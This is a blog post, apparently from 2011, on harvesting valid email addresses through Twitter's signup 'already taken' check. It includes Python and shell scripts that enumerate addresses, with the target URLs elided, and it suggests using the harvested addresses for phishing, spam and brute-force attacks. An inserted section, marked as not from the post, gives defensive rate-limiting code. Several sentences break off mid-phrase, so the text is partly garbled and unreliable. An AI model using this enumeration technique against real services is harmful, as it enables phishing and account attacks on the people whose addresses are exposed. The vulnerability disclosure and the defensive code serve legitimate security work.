Mar 16, 2011

Using Twitter for Phishing Campaign / Spam / Followers?

Simple and easy way to get a list of email accounts used on Twitter.
For Phishing campaigns, custom Spam...

Twitter has been notified, and I suppose it will be fixed someday if they think
this should be filtered.

When you create a new Twitter account, the form requests an email
address. Twitter verifies that the email account is not already in use, but
does not check any user token or limit the usage (no captcha, no blocking). ->

We just need to automate it with a simple script. ***Everything you
do will be your responsibility***
import sys, json, urllib2

# The URL of the registration check was elided in the original post;
# only the email address argument is appended to it.
f = urllib2.urlopen("" + sys.argv[1])
data = json.load(f)

def valid():
    # The reply carries this message when the address is already registered.
    return "Email has already been taken" in data["msg"]   # <-- reply

We just need a list of users to test, for example: (don't be evil is just an
Parsing the name/nickname and testing {user} () twitter com, a few
minutes later we have a list of ~400 valid internal email addresses
(* () twitter com). An attacker could probably.. run a brute force attack
(Google Apps), send Phishing or try to exploit some browser bugs
or similar. #Aurora #Google. Most of these e-mails are internal, not
There are also some that make you think they are used by such
A-Directory system users:
apache () twitter com
root () twitter com
mail () twitter com

But if you download a leaked database (RockYou, Gawker) or just a typical dictionary plus a list of domains, it will be quite
easy to get hold of a list of users large enough (* () hotmail com,
* () gmail com, etc.). For example, in my case I used it to find user accounts
in a pentest of a company that used Twitter. But it is probably not a good
idea to allow unlimited access: a malicious user could use these user
lists for Spam or Phishing.
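As an added example (not code from the post), here is the same "is this address taken?" check written from the defender's side: the leaky handler the post describes next to a hardened one that throttles per client and returns an identical reply whether or not the address is registered. The registered set and client keys are constructed sample data.

```python
import time
from collections import defaultdict, deque

# Constructed sample of registered addresses (not real data).
REGISTERED = {"alice@example.com", "apache@example.com"}


def leaky_check(email):
    """The pattern the post describes: the signup reply states
    outright whether the address is registered, with no throttling."""
    if email.lower() in REGISTERED:
        return {"valid": False, "msg": "Email has already been taken"}
    return {"valid": True, "msg": ""}


class RateLimiter:
    """Sliding-window limiter keyed by client (IP or session token)."""

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.hits = defaultdict(deque)

    def allow(self, key, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[key]
        # Drop timestamps that fell out of the window.
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.limit:
            return False
        q.append(now)
        return True


def hardened_check(email, client_key, limiter, now=None):
    """Same request, but throttled per client and answered with a reply
    that is identical whether or not the address is registered; the real
    outcome goes out of band to the mailbox owner."""
    if not limiter.allow(client_key, now):
        return {"status": 429, "msg": "Too many requests"}
    # The lookup still happens (to decide which email to send),
    # but its result is never exposed to the caller.
    _already_registered = email.lower() in REGISTERED
    return {"status": 200,
            "msg": "If this address can be registered, a confirmation email has been sent."}
```

The test of the fix is that the two replies for a taken and a free address compare equal, so the oracle the post relies on is gone even before the limiter kicks in.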
After I read it all, I tried to write it as a shell script; my video will be uploaded soon.

echo "Start checking email to twitter"
for list in `cat testlist`
do
        # The check URL was elided in the original post; wget's target is missing here.
        wget -q -O testing$list
        echo -n "$list is "
        response=`cat testing | grep already`
        if [ -n "$response" ]
        then
                echo "Email has already been taken"
        else
                echo "Email has not been registered to twitter"
        fi
done
